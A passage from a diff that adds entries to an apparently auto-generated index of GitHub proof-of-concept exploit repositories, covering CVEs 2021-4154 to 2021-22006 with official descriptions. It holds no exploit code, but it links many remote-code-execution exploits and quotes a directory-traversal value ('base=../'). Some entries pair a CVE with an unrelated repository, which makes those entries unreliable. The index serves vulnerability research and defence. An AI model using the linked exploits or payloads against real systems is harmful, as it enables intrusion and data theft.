+A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
+
+
+- [Markakd/CVE-2021-4154](https://github.com/Markakd/CVE-2021-4154)
+- [veritas501/CVE-2021-4154](https://github.com/veritas501/CVE-2021-4154)
+
+### CVE-2021-4191 (2022-03-28)
+
+An issue has been discovered in GitLab CE/EE affecting versions 13.0 to 14.6.5, 14.7 to 14.7.4, and 14.8 to 14.8.2. Private GitLab instances with restricted sign-ups may be vulnerable to user enumeration to unauthenticated users through the GraphQL API.
+
+
+- [Adelittle/CVE-2021-4191_Exploits](https://github.com/Adelittle/CVE-2021-4191_Exploits)
+- [K3ysTr0K3R/CVE-2021-4191-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-4191-EXPLOIT)
+
+### CVE-2021-4204 (2022-08-24)
+
+An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information.
+
+
+- [tr3ee/CVE-2021-4204](https://github.com/tr3ee/CVE-2021-4204)
+
+### CVE-2021-4428 (2023-07-18)
+
+In what3words Autosuggest Plugin bis 4.0.0 für WordPress wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Betroffen ist die Funktion enqueue_scripts der Datei w3w-autosuggest/public/class-w3w-autosuggest-public.php der Komponente Setting Handler. Mit der Manipulation mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Ein Aktualisieren auf die Version 4.0.1 vermag dieses Problem zu lösen. Der Patch wird als dd59cbac5f86057d6a73b87007c08b8bfa0c32ac bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
+
+
+- [CERT-hr/Log4Shell](https://github.com/CERT-hr/Log4Shell)
+
+### CVE-2021-6857
+- [zi0n8/CVE-2021-6857](https://github.com/zi0n8/CVE-2021-6857)
+
+### CVE-2021-6901
+- [mooneee/cve-2021-6901](https://github.com/mooneee/cve-2021-6901)
+
+### CVE-2021-10086
+- [AK-blank/CVE-2021-10086](https://github.com/AK-blank/CVE-2021-10086)
+
+### CVE-2021-20021 (2021-04-09)
+
+A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
+
+
+- [SUPRAAA-1337/CVE-2021-20021](https://github.com/SUPRAAA-1337/CVE-2021-20021)
+
+### CVE-2021-20038 (2021-12-08)
+
+A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
+
+
+- [jbaines-r7/badblood](https://github.com/jbaines-r7/badblood)
+- [vesperp/CVE-2021-20038-SonicWall-RCE](https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE)
+
+### CVE-2021-20138 (2021-12-09)
+
+An unauthenticated command injection vulnerability exists in multiple parameters in the Gryphon Tower router’s web interface at /cgi-bin/luci/rc. An unauthenticated remote attacker on the same network can execute commands as root on the device by sending a specially crafted malicious packet to the web interface.
+
+
+- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138)
+
+### CVE-2021-20233 (2021-03-03)
+
+A flaw was found in grub2 in versions prior to 2.06. Setparam_prefix() in the menu rendering code performs a length calculation on the assumption that expressing a quoted single quote will require 3 characters, while it actually requires 4 characters which allows an attacker to corrupt memory by one byte for each quote in the input. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
+
+
+- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix)
+
+### CVE-2021-20253 (2021-03-09)
+
+A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
+
+
+- [mbadanoiu/CVE-2021-20253](https://github.com/mbadanoiu/CVE-2021-20253)
+
+### CVE-2021-20294 (2021-04-29)
+
+A flaw was found in binutils readelf 2.35 program. An attacker who is able to convince a victim using readelf to read a crafted file could trigger a stack buffer overflow, out-of-bounds write of arbitrary data supplied by the attacker. The highest impact of this flaw is to confidentiality, integrity, and availability.
+
+
+- [tin-z/CVE-2021-20294-POC](https://github.com/tin-z/CVE-2021-20294-POC)
+
+### CVE-2021-20323 (2022-03-25)
+
+A POST based reflected Cross Site Scripting vulnerability on has been identified in Keycloak.
+
+
+- [ndmalc/CVE-2021-20323](https://github.com/ndmalc/CVE-2021-20323)
+- [Cappricio-Securities/CVE-2021-20323](https://github.com/Cappricio-Securities/CVE-2021-20323)
+
+### CVE-2021-20717 (2021-05-10)
+
+Cross-site scripting vulnerability in EC-CUBE 4.0.0 to 4.0.5 allows a remote attacker to inject a specially crafted script in the specific input field of the EC web site which is created using EC-CUBE. As a result, it may lead to an arbitrary script execution on the administrator's web browser.
+
+
+- [s-index/CVE-2021-20717](https://github.com/s-index/CVE-2021-20717)
+
+### CVE-2021-20837 (2021-10-26)
+
+Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability.
+
+
+- [ghost-nemesis/cve-2021-20837-poc](https://github.com/ghost-nemesis/cve-2021-20837-poc)
+- [orangmuda/CVE-2021-20837](https://github.com/orangmuda/CVE-2021-20837)
+- [Cosemz/CVE-2021-20837](https://github.com/Cosemz/CVE-2021-20837)
+- [bb33bb/CVE-2021-20837](https://github.com/bb33bb/CVE-2021-20837)
+
+### CVE-2021-21014 (2021-02-09)
+
+Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker. Access to the admin console is required for successful exploitation.
+
+
+- [HoangKien1020/CVE-2021-21014](https://github.com/HoangKien1020/CVE-2021-21014)
+
+### CVE-2021-21017 (2021-02-09)
+
+Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
+
+
+- [ZeusBox/CVE-2021-21017](https://github.com/ZeusBox/CVE-2021-21017)
+- [tzwlhack/CVE-2021-21017](https://github.com/tzwlhack/CVE-2021-21017)
+
+### CVE-2021-21042 (2021-02-09)
+
+Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Read vulnerability that could lead to arbitrary disclosure of information in the memory stack. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
+
+
+- [NattiSamson/CVE-2021-21042](https://github.com/NattiSamson/CVE-2021-21042)
+- [r1l4-i3pur1l4/CVE-2021-21042](https://github.com/r1l4-i3pur1l4/CVE-2021-21042)
+
+### CVE-2021-21086 (2022-10-03)
+
+Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability in the CoolType library. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
+
+
+- [infobyte/Exploit-CVE-2021-21086](https://github.com/infobyte/Exploit-CVE-2021-21086)
+
+### CVE-2021-21110 (2021-01-08)
+
+Use after free in safe browsing in Google Chrome prior to 87.0.4280.141 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.
+
+
+- [Gh0st0ne/CVE-2021-21110](https://github.com/Gh0st0ne/CVE-2021-21110)
+
+### CVE-2021-21123 (2021-02-09)
+
+Insufficient data validation in File System API in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page.
+
+
+- [Puliczek/CVE-2021-21123-PoC-Google-Chrome](https://github.com/Puliczek/CVE-2021-21123-PoC-Google-Chrome)
+
+### CVE-2021-21148 (2021-02-09)
+
+Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [Grayhaxor/CVE-2021-21148](https://github.com/Grayhaxor/CVE-2021-21148)
+
+### CVE-2021-21193 (2021-03-16)
+
+Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [mehrzad1994/CVE-2021-21193](https://github.com/mehrzad1994/CVE-2021-21193)
+
+### CVE-2021-21220 (2021-04-26)
+
+Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+
+
+- [security-dbg/CVE-2021-21220](https://github.com/security-dbg/CVE-2021-21220)
+
+### CVE-2021-21234 (2021-01-05)
+
+spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy.
+
+
+- [PwCNO-CTO/CVE-2021-21234](https://github.com/PwCNO-CTO/CVE-2021-21234)
+- [xiaojiangxl/CVE-2021-21234](https://github.com/xiaojiangxl/CVE-2021-21234)
+
+### CVE-2021-21300 (2021-03-09)
+
+Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.
+
+
+- [AlkenePan/CVE-2021-21300](https://github.com/AlkenePan/CVE-2021-21300)
+- [Faisal78123/CVE-2021-21300](https://github.com/Faisal78123/CVE-2021-21300)
+- [erranfenech/CVE-2021-21300](https://github.com/erranfenech/CVE-2021-21300)
+- [Maskhe/CVE-2021-21300](https://github.com/Maskhe/CVE-2021-21300)
+- [1uanWu/CVE-2021-21300](https://github.com/1uanWu/CVE-2021-21300)
+- [Kirill89/CVE-2021-21300](https://github.com/Kirill89/CVE-2021-21300)
+- [ETOCheney/cve-2021-21300](https://github.com/ETOCheney/cve-2021-21300)
+- [fengzhouc/CVE-2021-21300](https://github.com/fengzhouc/CVE-2021-21300)
+- [danshuizhangyu/CVE-2021-21300](https://github.com/danshuizhangyu/CVE-2021-21300)
+- [0ahu/CVE-2021-21300](https://github.com/0ahu/CVE-2021-21300)
+- [Jiang59991/cve-2021-21300](https://github.com/Jiang59991/cve-2021-21300)
+- [Jiang59991/cve-2021-21300-plus](https://github.com/Jiang59991/cve-2021-21300-plus)
+- [macilin/CVE-2021-21300](https://github.com/macilin/CVE-2021-21300)
+- [Roboterh/CVE-2021-21300](https://github.com/Roboterh/CVE-2021-21300)
+- [henry861010/Network_Security_NYCU](https://github.com/henry861010/Network_Security_NYCU)
+- [Saboor-Hakimi-23/CVE-2021-21300](https://github.com/Saboor-Hakimi-23/CVE-2021-21300)
+
+### CVE-2021-21311 (2021-02-11)
+
+Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
+
+
+- [llhala/CVE-2021-21311](https://github.com/llhala/CVE-2021-21311)
+- [omoknooni/CVE-2021-21311](https://github.com/omoknooni/CVE-2021-21311)
+
+### CVE-2021-21315 (2021-02-16)
+
+The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
+
+
+- [ForbiddenProgrammer/CVE-2021-21315-PoC](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC)
+- [cherrera0001/CVE-2021-21315v2](https://github.com/cherrera0001/CVE-2021-21315v2)
+- [MazX0p/CVE-2021-21315-exploit](https://github.com/MazX0p/CVE-2021-21315-exploit)
+- [alikarimi999/CVE-2021-21315](https://github.com/alikarimi999/CVE-2021-21315)
+- [G01d3nW01f/CVE-2021-21315](https://github.com/G01d3nW01f/CVE-2021-21315)
+- [xMohamed0/CVE-2021-21315-POC](https://github.com/xMohamed0/CVE-2021-21315-POC)
+
+### CVE-2021-21341 (2021-03-22)
+
+XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.
+
+
+- [s-index/CVE-2021-21341](https://github.com/s-index/CVE-2021-21341)
+- [Mani1325/ka-cve-2021-21341](https://github.com/Mani1325/ka-cve-2021-21341)
+
+### CVE-2021-21349 (2021-03-22)
+
+XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.
+
+
+- [s-index/CVE-2021-21349](https://github.com/s-index/CVE-2021-21349)
+
+### CVE-2021-21380 (2021-03-23)
+
+XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions of XWiki Platform (and only those with the Ratings API installed), the Rating Script Service expose an API to perform SQL requests without escaping the from and where search arguments. This might lead to an SQL script injection quite easily for any user having Script rights on XWiki. The problem has been patched in XWiki 12.9RC1. The only workaround besides upgrading XWiki would be to uninstall the Ratings API in XWiki from the Extension Manager.
+
+
+- [rvermeulen/codeql-workshop-cve-2021-21380](https://github.com/rvermeulen/codeql-workshop-cve-2021-21380)
+
+### CVE-2021-21389 (2021-03-26)
+
+BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.
+
+
+- [HoangKien1020/CVE-2021-21389](https://github.com/HoangKien1020/CVE-2021-21389)
+
+### CVE-2021-21402 (2021-03-23)
+
+Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.
+
+
+- [jiaocoll/CVE-2021-21402-Jellyfin](https://github.com/jiaocoll/CVE-2021-21402-Jellyfin)
+- [somatrasss/CVE-2021-21402](https://github.com/somatrasss/CVE-2021-21402)
+- [givemefivw/CVE-2021-21402](https://github.com/givemefivw/CVE-2021-21402)
+
+### CVE-2021-21403 (2021-03-26)
+
+In github.com/kongchuanhujiao/server before version 1.3.21 there is an authentication Bypass by Primary Weakness vulnerability. All users are impacted. This is fixed in version 1.3.21.
+
+
+- [5l1v3r1/CVE-2021-21403](https://github.com/5l1v3r1/CVE-2021-21403)
+
+### CVE-2021-21425 (2021-04-07)
+
+Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes, such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user. This vulnerability is fixed in version 1.10.8. Blocking access to the `/admin` path from untrusted sources can be applied as a workaround.
+
+
+- [CsEnox/CVE-2021-21425](https://github.com/CsEnox/CVE-2021-21425)
+- [frknktlca/GravCMS_Nmap_Script](https://github.com/frknktlca/GravCMS_Nmap_Script)
+
+### CVE-2021-21514 (2021-03-01)
+
+Dell EMC OpenManage Server Administrator (OMSA) versions 9.5 and prior contain a path traversal vulnerability. A remote user with admin privileges could potentially exploit this vulnerability to view arbitrary files on the target system by sending a specially crafted URL request.
+
+
+- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)
+
+### CVE-2021-21551 (2021-05-04)
+
+Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.\n\n
+
+
+- [waldo-irc/CVE-2021-21551](https://github.com/waldo-irc/CVE-2021-21551)
+- [ch3rn0byl/CVE-2021-21551](https://github.com/ch3rn0byl/CVE-2021-21551)
+- [arnaudluti/PS-CVE-2021-21551](https://github.com/arnaudluti/PS-CVE-2021-21551)
+- [mathisvickie/CVE-2021-21551](https://github.com/mathisvickie/CVE-2021-21551)
+- [mzakocs/CVE-2021-21551-POC](https://github.com/mzakocs/CVE-2021-21551-POC)
+- [ihack4falafel/Dell-Driver-EoP-CVE-2021-21551](https://github.com/ihack4falafel/Dell-Driver-EoP-CVE-2021-21551)
+- [tijme/kernel-mii](https://github.com/tijme/kernel-mii)
+- [nanabingies/CVE-2021-21551](https://github.com/nanabingies/CVE-2021-21551)
+
+### CVE-2021-21716
+- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py)
+
+### CVE-2021-21809 (2021-06-23)
+
+A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities.
+
+
+- [anldori/CVE-2021-21809](https://github.com/anldori/CVE-2021-21809)
+
+### CVE-2021-21972 (2021-02-24)
+
+The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+
+
+- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts)
+- [QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)
+- [NS-Sp4ce/CVE-2021-21972](https://github.com/NS-Sp4ce/CVE-2021-21972)
+- [yaunsky/CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972)
+- [horizon3ai/CVE-2021-21972](https://github.com/horizon3ai/CVE-2021-21972)
+- [Osyanina/westone-CVE-2021-21972-scanner](https://github.com/Osyanina/westone-CVE-2021-21972-scanner)
+- [alt3kx/CVE-2021-21972](https://github.com/alt3kx/CVE-2021-21972)
+- [milo2012/CVE-2021-21972](https://github.com/milo2012/CVE-2021-21972)
+- [Udyz/CVE-2021-21972](https://github.com/Udyz/CVE-2021-21972)
+- [conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://github.com/conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972)
+- [L-pin/CVE-2021-21972](https://github.com/L-pin/CVE-2021-21972)
+- [B1anda0/CVE-2021-21972](https://github.com/B1anda0/CVE-2021-21972)
+- [renini/CVE-2021-21972](https://github.com/renini/CVE-2021-21972)
+- [stevenp322/cve-2021-21972](https://github.com/stevenp322/cve-2021-21972)
+- [GuayoyoCyber/CVE-2021-21972](https://github.com/GuayoyoCyber/CVE-2021-21972)
+- [JMousqueton/Detect-CVE-2021-21972](https://github.com/JMousqueton/Detect-CVE-2021-21972)
+- [robwillisinfo/VMware_vCenter_CVE-2021-21972](https://github.com/robwillisinfo/VMware_vCenter_CVE-2021-21972)
+- [Ma1Dong/vcenter_rce](https://github.com/Ma1Dong/vcenter_rce)
+- [d3sh1n/cve-2021-21972](https://github.com/d3sh1n/cve-2021-21972)
+- [ByZain/CVE-2021-21972](https://github.com/ByZain/CVE-2021-21972)
+- [TaroballzChen/CVE-2021-21972](https://github.com/TaroballzChen/CVE-2021-21972)
+- [ZTK-009/CVE-2021-21972](https://github.com/ZTK-009/CVE-2021-21972)
+- [murataydemir/CVE-2021-21972](https://github.com/murataydemir/CVE-2021-21972)
+- [pettyhacks/vSphereyeeter](https://github.com/pettyhacks/vSphereyeeter)
+- [haidv35/CVE-2021-21972](https://github.com/haidv35/CVE-2021-21972)
+- [orangmuda/CVE-2021-21972](https://github.com/orangmuda/CVE-2021-21972)
+- [user16-et/cve-2021-21972_PoC](https://github.com/user16-et/cve-2021-21972_PoC)
+- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller)
+
+### CVE-2021-21973 (2021-02-24)
+
+The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+
+
+- [freakanonymous/CVE-2021-21973-Automateme](https://github.com/freakanonymous/CVE-2021-21973-Automateme)
+
+### CVE-2021-21974 (2021-02-24)
+
+OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution.
+
+
+- [Shadow0ps/CVE-2021-21974](https://github.com/Shadow0ps/CVE-2021-21974)
+- [n2x4/Feb2023-CVE-2021-21974-OSINT](https://github.com/n2x4/Feb2023-CVE-2021-21974-OSINT)
+- [CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi](https://github.com/CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi)
+- [hateme021202/cve-2021-21974](https://github.com/hateme021202/cve-2021-21974)
+
+### CVE-2021-21975 (2021-03-31)
+
+Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
+
+
+- [Henry4E36/VMWare-vRealize-SSRF](https://github.com/Henry4E36/VMWare-vRealize-SSRF)
+- [dorkerdevil/CVE-2021-21975](https://github.com/dorkerdevil/CVE-2021-21975)
+- [Al1ex/CVE-2021-21975](https://github.com/Al1ex/CVE-2021-21975)
+- [TheTh1nk3r/exp_hub](https://github.com/TheTh1nk3r/exp_hub)
+- [GuayoyoCyber/CVE-2021-21975](https://github.com/GuayoyoCyber/CVE-2021-21975)
+- [murataydemir/CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975)
+- [rabidwh0re/REALITY_SMASHER](https://github.com/rabidwh0re/REALITY_SMASHER)
+- [Vulnmachines/VMWare-CVE-2021-21975](https://github.com/Vulnmachines/VMWare-CVE-2021-21975)
+
+### CVE-2021-21978 (2021-03-03)
+
+VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container.
+
+
+- [GreyOrder/CVE-2021-21978](https://github.com/GreyOrder/CVE-2021-21978)
+- [me1ons/CVE-2021-21978](https://github.com/me1ons/CVE-2021-21978)
+- [skytina/CVE-2021-21978](https://github.com/skytina/CVE-2021-21978)
+
+### CVE-2021-21980 (2021-11-24)
+
+The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.
+
+
+- [Osyanina/westone-CVE-2021-21980-scanner](https://github.com/Osyanina/westone-CVE-2021-21980-scanner)
+- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner)
+
+### CVE-2021-21983 (2021-03-31)
+
+Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.
+
+
+- [murataydemir/CVE-2021-21983](https://github.com/murataydemir/CVE-2021-21983)
+
+### CVE-2021-21985 (2021-05-26)
+
+The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
+
+
+- [bigbroke/CVE-2021-21985](https://github.com/bigbroke/CVE-2021-21985)
+- [alt3kx/CVE-2021-21985_PoC](https://github.com/alt3kx/CVE-2021-21985_PoC)
+- [onSec-fr/CVE-2021-21985-Checker](https://github.com/onSec-fr/CVE-2021-21985-Checker)
+- [mauricelambert/CVE-2021-21985](https://github.com/mauricelambert/CVE-2021-21985)
+- [xnianq/cve-2021-21985_exp](https://github.com/xnianq/cve-2021-21985_exp)
+- [daedalus/CVE-2021-21985](https://github.com/daedalus/CVE-2021-21985)
+- [testanull/Project_CVE-2021-21985_PoC](https://github.com/testanull/Project_CVE-2021-21985_PoC)
+- [haidv35/CVE-2021-21985](https://github.com/haidv35/CVE-2021-21985)
+- [aristosMiliaressis/CVE-2021-21985](https://github.com/aristosMiliaressis/CVE-2021-21985)
+- [sknux/CVE-2021-21985_PoC](https://github.com/sknux/CVE-2021-21985_PoC)
+
+### CVE-2021-22005 (2021-09-23)
+
+The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
+
+
+- [1ZRR4H/CVE-2021-22005](https://github.com/1ZRR4H/CVE-2021-22005)
+- [pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity)
+- [Jeromeyoung/VMWare-CVE-Check](https://github.com/Jeromeyoung/VMWare-CVE-Check)
+- [5gstudent/CVE-2021-22005-](https://github.com/5gstudent/CVE-2021-22005-)
+- [RedTeamExp/CVE-2021-22005_PoC](https://github.com/RedTeamExp/CVE-2021-22005_PoC)
+- [rwincey/CVE-2021-22005](https://github.com/rwincey/CVE-2021-22005)
+- [TaroballzChen/CVE-2021-22005-metasploit](https://github.com/TaroballzChen/CVE-2021-22005-metasploit)
+- [tiagob0b/CVE-2021-22005](https://github.com/tiagob0b/CVE-2021-22005)
+- [Jun-5heng/CVE-2021-22005](https://github.com/Jun-5heng/CVE-2021-22005)
+- [shmilylty/cve-2021-22005-exp](https://github.com/shmilylty/cve-2021-22005-exp)
+- [timb-machine-mirrors/testanull-CVE-2021-22005.py](https://github.com/timb-machine-mirrors/testanull-CVE-2021-22005.py)
+- [InventorMAO/cve-2021-22005](https://github.com/InventorMAO/cve-2021-22005)
+
+### CVE-2021-22006 (2021-09-23)
+
+The vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints.
+
+
+- [CrackerCat/CVE-2021-22006](https://github.com/CrackerCat/CVE-2021-22006)
+
+### CVE-2021-22015 (2021-09-23)
+
